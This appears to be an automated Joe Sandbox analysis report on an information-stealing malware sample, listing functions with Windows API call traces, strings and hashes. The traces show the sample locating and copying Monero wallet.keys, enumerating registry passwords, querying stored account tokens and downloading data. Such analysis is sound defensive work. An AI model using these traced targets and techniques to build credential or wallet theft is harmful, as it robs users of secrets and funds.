                          • Instruction ID: c05393eb04ec44c6fe85ad94185a865410f12148ef4abac83dd32f8cf579e630
                          • Opcode Fuzzy Hash: c7906df01814cb8162998f9994078c85a877aa59f8b339b754ab25a6d70ae9a1
                          • Instruction Fuzzy Hash: D17135B6A00208ABCB24FBA4DC95FEE7379EB48300F148598F60997185DA75DB45CFB1
                          Function 00DE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                            • Part of subcall function 00DE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                            • Part of subcall function 00DE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                            • Part of subcall function 00DE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                            • Part of subcall function 00DE12A0: RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00DE134F
                          • lstrlen.KERNEL32(?), ref: 00DE135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00DE1377
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DE1465
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00DE14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 15a600316d765a945becb27d55fffaaec593ee6350cd921d2cc2ad479fc40c32
                          • Instruction ID: 75ef64af6fd5467630cf3e2a09335c3f1e2ffa037adf0e230c8cf52a95ed8eb0
                          • Opcode Fuzzy Hash: 15a600316d765a945becb27d55fffaaec593ee6350cd921d2cc2ad479fc40c32
                          • Instruction Fuzzy Hash: FA512FF195021997CB25FB64DD92AED737CEF50300F4181A8B70E66082EE706B89CBB5
                          Function 00DE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                            • Part of subcall function 00DE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                            • Part of subcall function 00DE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                            • Part of subcall function 00DE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                            • Part of subcall function 00DE72D0: HeapFree.KERNEL32(00000000), ref: 00DE7459
                          • lstrcat.KERNEL32(00000000,00E017FC), ref: 00DE7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00DE765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE768F
                          • lstrcat.KERNEL32(00000000,00E01804), ref: 00DE76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DE76D3
                          • lstrcat.KERNEL32(00000000,00E01808), ref: 00DE76ED
                          • task.LIBCPMTD ref: 00DE76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                          • Instruction ID: 8832eefe7296b19e313e7f0714ce9a3b71c90e5d6bcb827873d08b392c08a861
                          • Opcode Fuzzy Hash: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                          • Instruction Fuzzy Hash: CA314F75A00249DBCB68FFA5DC59DFE7378EB48301B204118F106A7284DE39A946DB70
                          Function 00DF8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00840330,00000000,?,00E00E2C,00000000,?,00000000), ref: 00DF8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DF8158
                          • __aulldiv.LIBCMT ref: 00DF8172
                          • __aulldiv.LIBCMT ref: 00DF8180
                          • wsprintfA.USER32 ref: 00DF81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                          • Instruction ID: 7f8d9f0be049c980da77cb8076944dffc0a2677623dbcbeacf2dca0f6ce5b7d1
                          • Opcode Fuzzy Hash: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                          • Instruction Fuzzy Hash: B821F9B1E44218ABDB10DFD4CC49FAEB7B9EB44B10F208609F705BB284DB7959058BA5
                          Function 00DE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                          • InternetOpenA.WININET(00E00DF7,00000001,00000000,00000000,00000000), ref: 00DE610F
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DE618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DE61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00DE61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DE620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00DE6249
                          • InternetCloseHandle.WININET(?), ref: 00DE6253
                          • InternetCloseHandle.WININET(00000000), ref: 00DE6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                          • Instruction ID: 4983c4b91fdbd00237fe5f8b9746e192f516ac4d5b51b42653c29ebcafed9f11
                          • Opcode Fuzzy Hash: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                          • Instruction Fuzzy Hash: 89516EB1A00218EBDB20EF51DC45BEE77B8FB44745F108098E709A7184DB75AA85CFB9
                          Function 00DE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                          • HeapFree.KERNEL32(00000000), ref: 00DE7459
                          • task.LIBCPMTD ref: 00DE7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                          • Instruction ID: 5d61987f21070368134c4e0ccd51b8ec5afc415edf1f60a8b275e2c1826a0e0d
                          • Opcode Fuzzy Hash: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                          • Instruction Fuzzy Hash: 29611AB59042989BDB24EB51DC51BD9B7B8FF44300F0481E9E689A6181EBB05FC9CFB0
                          Function 00DEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00DEBC9F
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DEBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00DEBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00DEBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                          • Instruction ID: 466480349c74b5feda3ff6c6356eb341d0cae080d06d67f7c5b28c302d22f1b5
                          • Opcode Fuzzy Hash: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                          • Instruction Fuzzy Hash: 93B15FB191011C9BCB14FBA4CC96EFE7338EF54300F558169F60AA6095EF746A49CB72
                          Function 00DF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                          • Instruction ID: b81483b4ae803f9f8c695413070e5cf4afddae1606be2ced5e71c07000805122
                          • Opcode Fuzzy Hash: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                          • Instruction Fuzzy Hash: DFF05430A04209EFD364AFE0E90972CBB70FB14707F244198E646C7F84DA7A4B41DBA9
                          Function 00DE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DE4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE4FD1
                          • InternetOpenA.WININET(00E00DDF,00000000,00000000,00000000,00000000), ref: 00DE4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DE5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DE5041
                          • InternetCloseHandle.WININET(?), ref: 00DE50B9
                          • InternetCloseHandle.WININET(?), ref: 00DE50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 6186cb7dbcabc4e6126f4cfb9239a78eaf9cd58d6a811a54fca076c48b0ef2fc
                          • Instruction ID: e4d3d8b108aba24b2291ad4d241afde3039a6dda500ffaec568b511796da6345
                          • Opcode Fuzzy Hash: 6186cb7dbcabc4e6126f4cfb9239a78eaf9cd58d6a811a54fca076c48b0ef2fc
                          • Instruction Fuzzy Hash: 3431F7B4A00218EBDB20DF54DC85BD8B7B4FB48704F5081D9F609A7285CB756A858FA8
                          Function 00DF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                          • wsprintfA.USER32 ref: 00DF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00840570,00000000,000F003F,?,00000400), ref: 00DF84EC
                          • lstrlen.KERNEL32(?), ref: 00DF8501
                          • RegQueryValueExA.ADVAPI32(00000000,008404F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E00B34), ref: 00DF8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
